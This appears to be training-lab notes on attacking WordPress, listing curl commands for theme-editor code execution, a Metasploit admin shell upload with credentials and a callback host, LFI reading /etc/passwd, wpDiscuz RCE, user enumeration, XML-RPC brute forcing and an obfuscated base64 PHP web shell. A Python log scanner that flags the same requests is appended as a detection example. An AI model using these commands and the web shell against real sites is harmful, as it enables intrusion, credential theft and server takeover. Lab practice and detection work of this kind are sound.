# 2. Attacking WordPress

### 1. Manual Code Execution via Theme Editor (404.php)

```bash
curl 'http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id'
```

### 2. Metasploit wp\_admin\_shell\_upload

```bash
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username john
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password firebird1
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 10.10.14.15
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 10.129.42.195
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set VHOST blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
```

### 3. mail-masta LFI Exploit

```bash
curl -s 'http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd'
```

### 4. wpDiscuz RCE Exploit

#### Python Script Method

```bash
python3 wp_discuz.py -u http://blog.inlanefreight.local -p '/?p=1'
```

#### Curl Method

```bash
curl -s 'http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id'
```

### 5. WordPress REST API User Enumeration

```bash
curl -s http://blog.inlanefreight.local/wp-json/wp/v2/users
```

### 6. XML-RPC Brute Force (system.multicall)

```bash
python3 xmlrpc_bruteforce.py -u http://blog.inlanefreight.local/xmlrpc.php -U users.txt -P passwords.txt
```

### 7. wp-config.php Exposure Check

```bash
curl -s http://blog.inlanefreight.local/wp-config.php
```

### 8. Web Shell Obfuscation Example

```php
<?php eval(base64_decode("c3lzdGVtKCRfR0VUWyJjbWQiXSk7")); ?>
```
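
The requests in sections 1 through 7 each leave a recognizable entry in the web server access log. The following is an added example, not part of the original notes: it classifies constructed combined-log-format lines that mirror those requests, and the rule names, the `classify`/`scan` helpers and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed combined-log-format lines mirroring the requests above (not real server logs).
SAMPLE_LOG = '''\
10.10.14.15 - - [25/Aug/2021:15:01:02 +0000] "GET /wp-content/themes/twentynineteen/404.php?0=id HTTP/1.1" 200 54 "-" "curl/7.74.0"
10.10.14.15 - - [25/Aug/2021:15:02:10 +0000] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 200 1801 "-" "curl/7.74.0"
10.10.14.15 - - [25/Aug/2021:15:03:44 +0000] "GET /wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id HTTP/1.1" 200 60 "-" "curl/7.74.0"
10.10.14.15 - - [25/Aug/2021:15:04:00 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 912 "-" "curl/7.74.0"
10.10.14.15 - - [25/Aug/2021:15:05:30 +0000] "POST /xmlrpc.php HTTP/1.1" 200 48213 "-" "python-requests/2.25.1"
10.10.14.15 - - [25/Aug/2021:15:06:12 +0000] "GET /wp-config.php HTTP/1.1" 200 0 "-" "curl/7.74.0"
192.0.2.7 - - [25/Aug/2021:15:07:00 +0000] "GET /?p=1 HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
'''

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" \d{3} ')

def classify(method, target):
    """Return the names of the rules a single request matches."""
    url = urlsplit(target)
    path = unquote(url.path).lower()
    values = [v for _, v in parse_qsl(url.query, keep_blank_values=True)]
    hits = []
    if re.match(r"/wp-content/themes/[^/]+/.+\.php$", path) and values:
        hits.append("theme-template-direct")   # templates are included by WordPress, not called with parameters
    if re.match(r"/wp-content/uploads/.+\.php$", path):
        hits.append("php-in-uploads")          # the uploads tree should only serve media
    if any(v.startswith("/etc/") or "../" in v for v in values):
        hits.append("file-path-in-parameter")  # LFI-style parameter value
    if path.rstrip("/") == "/wp-json/wp/v2/users":
        hits.append("rest-user-listing")
    if method == "POST" and path == "/xmlrpc.php":
        hits.append("xmlrpc-post")             # one POST can carry many system.multicall logins
    if path.endswith("/wp-config.php"):
        hits.append("wp-config-request")
    return hits

def scan(log_text):
    """Map each client IP to the sorted rule names its requests matched."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, method, target = m.groups()
        for rule in classify(method, target):
            findings.setdefault(ip, set()).add(rule)
    return {ip: sorted(rules) for ip, rules in findings.items()}

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Legitimate clients also POST to `xmlrpc.php`, so treat `xmlrpc-post` as a signal to correlate with response size and request rate rather than as an alert by itself.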
